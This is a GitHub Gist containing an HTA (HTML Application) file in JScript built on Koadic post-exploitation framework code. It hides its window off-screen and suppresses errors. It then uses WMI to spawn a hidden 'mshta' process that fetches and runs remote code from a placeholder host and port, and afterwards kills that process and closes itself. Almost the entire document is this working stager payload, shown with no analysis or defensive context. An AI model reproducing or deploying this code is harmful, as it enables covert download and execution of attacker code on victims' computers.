Created
June 14, 2019 02:07
-
-
Save TheNaterz/084aa02999af3794e369150d61ca137b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script language="JScript"> | |
window.moveTo(-1337, -2019); | |
window.blur(); | |
window.resizeTo(2, 4); | |
try | |
{ | |
window.onerror = function(sMsg, sUrl, sLine) { return false; } | |
window.onfocus = function() { window.blur(); } | |
} | |
catch (e){} | |
var Koadic = {}; | |
Koadic.WS = new ActiveXObject("WScript.Shell"); | |
Koadic.isHTA = function() | |
{ | |
return typeof(window) !== "undefined"; | |
} | |
Koadic.process = {}; | |
//process.currentPID.start | |
Koadic.process.currentPID = function() | |
{ | |
var cmd = Koadic.file.getPath("%comspec% /K hostname"); | |
//Koadic.WS.Run(cmd, 0, false); | |
var childPid = Koadic.WMI.createProcess(cmd); | |
var pid = -1; | |
// there could be a race condition, but CommandLine returns null on win2k | |
// and is often null on later windows with more harsh privileges | |
// todo: this method is stupid. instead of using .Run, spawn a WMI process. | |
// then we get child PID for free and can backtrack PPID, no race condition | |
var latestTime = 0; | |
var latestProc = null; | |
var processes = Koadic.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
/* | |
if (proc.Name.indexOf("cmd") != -1) | |
{ | |
if (latestTime == 0 && proc.CreationDate) | |
latestTime = proc.CreationDate; | |
if (proc.CreationDate > latestTime) | |
{ | |
latestTime = proc.CreationDate; | |
latestProc = proc; | |
} | |
} | |
*/ | |
if (proc.ProcessId == childPid) | |
{ | |
latestProc = proc; | |
break; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
pid = latestProc.ParentProcessId; | |
latestProc.Terminate(); | |
return pid; | |
} | |
//process.currentPID.end | |
//process.kill.start | |
Koadic.process.kill = function(pid) | |
{ | |
var processes = Koadic.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
if (proc.ProcessId == pid) | |
{ | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
return false; | |
} | |
//process.kill.end | |
//process.list.start | |
Koadic.process.list = function() | |
{ | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); | |
var query = "Select * From Win32_Process"; | |
return wmi.ExecQuery(query); | |
} | |
Koadic.exit = function() | |
{ | |
if (Koadic.isHTA()) | |
{ | |
// crappy hack? | |
try { | |
window.close(); | |
} catch(e){} | |
try { | |
window.self.close(); | |
} catch (e){} | |
try { | |
window.top.close(); | |
} catch (e){} | |
try{ | |
self.close(); | |
} catch (e){} | |
try | |
{ | |
window.open('', '_self', ''); | |
window.close(); | |
} | |
catch (e) | |
{ | |
} | |
} | |
try | |
{ | |
WScript.quit(); | |
} | |
catch (e) | |
{ | |
} | |
try | |
{ | |
var pid = Koadic.process.currentPID(); | |
Koadic.process.kill(pid); | |
} | |
catch (e) | |
{ | |
} | |
} | |
Koadic.WMI = {}; | |
//WMI.createProcess.start | |
Koadic.WMI.createProcess = function(cmd) | |
{ | |
var SW_HIDE = 0; | |
var pid = 0; | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); | |
si.ShowWindow = SW_HIDE; | |
si.CreateFlags = 16777216; | |
si.X = si.Y = si.XSize = si.ySize = 1; | |
//wmi.Get("Win32_Process").Create(cmd, null, si, pid); | |
var w32proc = wmi.Get("Win32_Process"); | |
var method = w32proc.Methods_.Item("Create"); | |
var inParams = method.InParameters.SpawnInstance_(); | |
inParams.CommandLine = cmd; | |
inParams.CurrentDirectory = null; | |
inParams.ProcessStartupInformation = si; | |
var outParams = w32proc.ExecMethod_("Create", inParams); | |
return outParams.ProcessId; | |
} | |
//WMI.createProcess.end | |
Koadic.shell = {}; | |
Koadic.shell.run = function(cmd, fork) | |
{ | |
var fork = (typeof(fork) !== "undefined") ? fork : true; | |
var c = "%comspec% /q /c " + cmd; | |
Koadic.WS.Run(cmd, 0, !fork); | |
} | |
try{ | |
var a = Koadic.WMI.createProcess('mshta http://x.x.x.x:9999/test123'); | |
Koadic.shell.run('ping 127.0.0.1 -n 11', false); | |
Koadic.shell.run('taskkill /f /pid '+a); | |
}catch(e) {} | |
Koadic.exit(); | |
</script> | |
<hta:application caption="no" windowState="minimize" showInTaskBar="no" | |
scroll="no" navigable="no" /> | |
<!-- --> | |
</head> | |
<body> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment